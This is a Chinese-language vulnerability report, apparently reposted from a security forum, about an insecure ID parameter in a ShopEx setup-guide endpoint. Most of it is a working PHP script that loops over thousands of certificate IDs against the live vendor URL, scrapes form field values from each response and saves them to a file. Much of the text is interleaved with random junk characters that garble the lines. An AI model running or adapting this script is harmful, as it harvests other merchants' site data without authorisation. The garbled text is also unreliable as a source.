|
|
简要描述: A5 n1 F8 n- x& X- S& J
ShopEx某接口缺陷,可遍历所有网站
. r& f, q- L1 P$ I% _详细说明:
% _9 u7 U2 B6 e8 j1 U( ^! n/ O问题出现在shopex 网店使用向导页面
3 m$ R0 u6 z5 v) b' h" w j# ?5 e& L; e0 i( P9 w9 g$ \7 h
% f: k. A5 Z& K0 d( s" Q
& g* |: b! z$ Yhttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=) c- S% @7 h s% E
8 u+ b; B: P P! h* _6 A+ h# U
5 r4 e7 b8 P" s! g+ J9 _3 ]% q: P& ^
2 S' Y, `+ D2 D$ i1 I
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}. |- k w9 l" Y% ~
5 D6 p8 V( B( r. b5 R
& k u2 W1 y p. d
" X5 R3 e7 n" l1 q我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
8 q3 P3 K% e& [8 [ m
5 {( \' @7 j0 Q: d" K; T' a8 h; q1 k5 `
3 e) l' T7 ?; b% R1 [! d: [
<?php8 z: ?, N# I/ ]4 T! m" o# A4 N# z9 I
* Y$ |3 s" }+ h) N
for ($i=1; $i < 10000; $i++) { //遍历, y; ^" c3 \$ e* ]6 r1 x, e
' Z* @2 O. _4 z3 L) g, C ShowshopExD($i);' S Z1 ]3 r6 t, d& `# c1 H; J# x7 l
- I; c/ S' ~2 W! ?# a }+ l' D' k$ B5 }/ P
# y a% L! [; K. ^* p- h3 ] function ShowshopExD($cid) {# k) G3 q; Y6 i
) `8 o9 r0 j1 L7 B, R2 T $url='http://guide.ecos.shopex.cn/step2.php';
( W, ]8 C7 Y0 @2 r7 ~) K$ m- w; }) v- K6 |" [5 }' M& e! p: o
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
) x; F- d7 j, }7 n6 d; z5 @. A6 r. X, ^
4 q" h, C" i( X $url = $url.'?refer='.$refer;
' G0 N) k2 H3 j
8 e" C# L$ l3 o $ch = curl_init($url);
2 N$ T( R4 e3 t/ |2 `$ O1 k9 w$ u4 e+ J; E* _
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
- ?: J! N. ]+ f6 V- {( Q$ X$ [1 X! F7 a( K$ f
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;( a" n, V4 \+ B- U9 P- Z9 L7 k
6 U/ B" ~) h" H5 T5 j
$result = curl_exec($ch);
" L2 L/ r* m( K( @8 w
7 Q. q( F! J1 M1 b+ V9 r- s3 r $result = mb_convert_encoding($result, "gb2312", "UTF-8");7 R Y! f2 s; @
: O ]/ V8 ?0 m+ j- P; ] if(strpos($result,$refer))3 D7 a" `0 ^/ \( i, Q1 t# H
, Q. y4 ^+ O: ~3 A4 D
{
. {$ [' L) |( p. o8 T
6 |1 d- }& A- a) [4 j $fp = fopen("c:/shopEx.txt",'ab'); //保存文件: t' g6 R; r# _
7 v0 b" Q+ C- r, U4 U* P# N
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);/ g$ j- e6 t& O; X
5 N# D- p1 f! L! b! {6 v
foreach ($value[1] as $key) {
. o7 S! Q, A& ]% J; G% e$ b$ f# W; K# I8 o
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
8 G0 u0 E. _: }% I; L) k* V" G/ L* J' s* P; ~
echo $res[1][0].':'.$res[3][0]."\r\n";
2 j& J F; C3 g0 d- Z' @
F: o! r( @! j3 f k$ `, |( h $col =$res[1][0].':'.$res[3][0]."\r\n";
7 o! p9 c- k. N
9 d7 B7 @& k$ e fwrite($fp, $col, strlen($col)); , Q1 O: z. Z& v$ h4 }6 q
0 \! q' P" u/ v8 G$ F
}
( k |4 Z0 z4 |0 l+ z
6 @0 {. p) N+ `, t' t echo '--------------------------------'."\r\n";
. X" Z1 z- U$ X M3 o5 ^8 G7 t
/ X* n# {& P. Y6 y. s fclose($fp);
1 M8 O) u1 n- H1 n9 Y3 Q$ W' E6 O, I/ [2 R
}
/ o+ w: y$ w/ z4 d) ?1 p% r! h" d( g( c! u( d* g# @* t
flush();% @5 ~) _( Q, q) @' Y3 l
/ x1 m# T# w* y& d: J1 ]
curl_close($ch);
5 ?3 W& B* A( h# t" B! T
1 [) M' [- G8 H1 w! j4 T/ T }8 m! m! }- }$ u- `6 g
# Q9 {2 a, s5 E% H# w9 [' {
?>9 J% F- [8 k9 R2 F4 g
漏洞证明:
2 g9 ]5 C' Z" A! Ahttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg6 Q- t5 }& {6 n+ M& d
refer换成其他加密方式2 Z0 X$ L) X; W& b8 }
|
|